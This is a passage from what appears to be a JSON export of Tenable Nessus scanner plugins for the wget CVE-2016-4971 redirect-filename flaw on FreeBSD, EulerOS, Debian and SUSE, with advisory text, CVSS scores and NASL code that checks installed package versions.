(6df56c60-3738-11e6-a671-60a44ce6887b)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:wget", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_6DF56C60373811E6A67160A44CE6887B.NASL", "href": "https://www.tenable.com/plugins/nessus/91734", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91734);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-4971\");\n\n script_name(english:\"FreeBSD : wget -- HTTP to FTP redirection file name confusion vulnerability (6df56c60-3738-11e6-a671-60a44ce6887b)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Giuseppe Scrivano reports :\n\nOn a server redirect from HTTP to a FTP resource, wget would trust the\nHTTP server and uses the name in the redirected URL as the destination\nfilename.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\"\n );\n # https://vuxml.freebsd.org/freebsd/6df56c60-3738-11e6-a671-60a44ce6887b.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?695e4a7e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"wget<1.18\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T14:22:39", "description": "According to the version of the wget package installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.(CVE-2016-4971)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : wget (EulerOS-SA-2016-1064)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:wget", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2016-1064.NASL", "href": "https://www.tenable.com/plugins/nessus/99826", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99826);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-4971\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : wget (EulerOS-SA-2016-1064)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the wget package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - It was found that wget used a file name provided by the\n server for the downloaded file when following a HTTP\n redirect to a FTP server resource. This could cause\n wget to create a file with a different name than\n expected, possibly allowing the server to execute\n arbitrary code on the client.(CVE-2016-4971)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1064\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dcd116e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"wget-1.14-10.2.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:40:01", "description": "On a server redirect from HTTP to a FTP resource, wget would trust the HTTP server and uses the name in the redirected URL as the destination filename. This behaviour was changed and now it works similarly as a redirect from HTTP to another HTTP resource so the original name is used as the destination file. To keep the previous behaviour the user must provide --trust-server-names.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.13.4-3+deb7u3.\n\nWe recommend that you upgrade your wget packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-01T00:00:00", "type": "nessus", "title": "Debian DLA-536-1 : wget security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:wget", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-536.NASL", "href": "https://www.tenable.com/plugins/nessus/91903", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-536-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91903);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4971\");\n\n script_name(english:\"Debian DLA-536-1 : wget security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"On a server redirect from HTTP to a FTP resource, wget would trust the\nHTTP server and uses the name in the redirected URL as the destination\nfilename. This behaviour was changed and now it works similarly as a\nredirect from HTTP to another HTTP resource so the original name is\nused as the destination file. To keep the previous behaviour the user\nmust provide --trust-server-names.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.13.4-3+deb7u3.\n\nWe recommend that you upgrade your wget packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/06/msg00037.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/wget\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"wget\", reference:\"1.13.4-3+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-02T16:53:30", "description": "This update for wget fixes the following issues :\n\n - CVE-2016-4971: A HTTP to FTP redirection file name confusion vulnerability was fixed. (bsc#984060).\n\n - CVE-2016-7098: A potential race condition was fixed by creating files with .tmp ext and making them accessible to the current user only. (bsc#995964) Bug fixed :\n\n - Wget failed with basicauth: Failed writing HTTP request:\n Bad file descriptor (bsc#958342)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-09-26T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : wget (SUSE-SU-2016:2358-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971", "CVE-2016-7098"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:wget", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-2358-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93714", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2358-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93714);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-4971\", \"CVE-2016-7098\");\n\n script_name(english:\"SUSE SLES11 Security Update : wget (SUSE-SU-2016:2358-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issues :\n\n - CVE-2016-4971: A HTTP to FTP redirection file name\n confusion vulnerability was fixed. (bsc#984060).\n\n - CVE-2016-7098: A potential race condition was fixed by\n creating files with .tmp ext and making them accessible\n to the current user only. (bsc#995964) Bug fixed :\n\n - Wget failed with basicauth: Failed writing HTTP request:\n Bad file descriptor (bsc#958342)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=995964\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4971/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7098/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162358-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?049bf5c9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5:zypper in -t patch sleclo50sp3-wget-12757=1\n\nSUSE Manager Proxy 2.1:zypper in -t patch slemap21-wget-12757=1\n\nSUSE Manager 2.1:zypper in -t patch sleman21-wget-12757=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-wget-12757=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-wget-12757=1\n\nSUSE Linux Enterprise Server 11-SECURITY:zypper in -t patch\nsecsp3-wget-12757=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-wget-12757=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-wget-12757=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-wget-12757=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"wget-1.11.4-1.32.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"wget-1.11.4-1.32.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-02T16:54:23", "description": "This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096, CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP request: Bad file descriptor (bsc#958342)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-09-08T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : wget (SUSE-SU-2016:2226-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-2059", "CVE-2016-4971"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:wget", "p-cpe:/a:novell:suse_linux:wget-debuginfo", "p-cpe:/a:novell:suse_linux:wget-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-2226-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93369", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2226-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93369);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-2059\", \"CVE-2016-4971\");\n script_bugtraq_id(72736);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : wget (SUSE-SU-2016:2226-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2059/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4971/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162226-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0ac3f58d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE 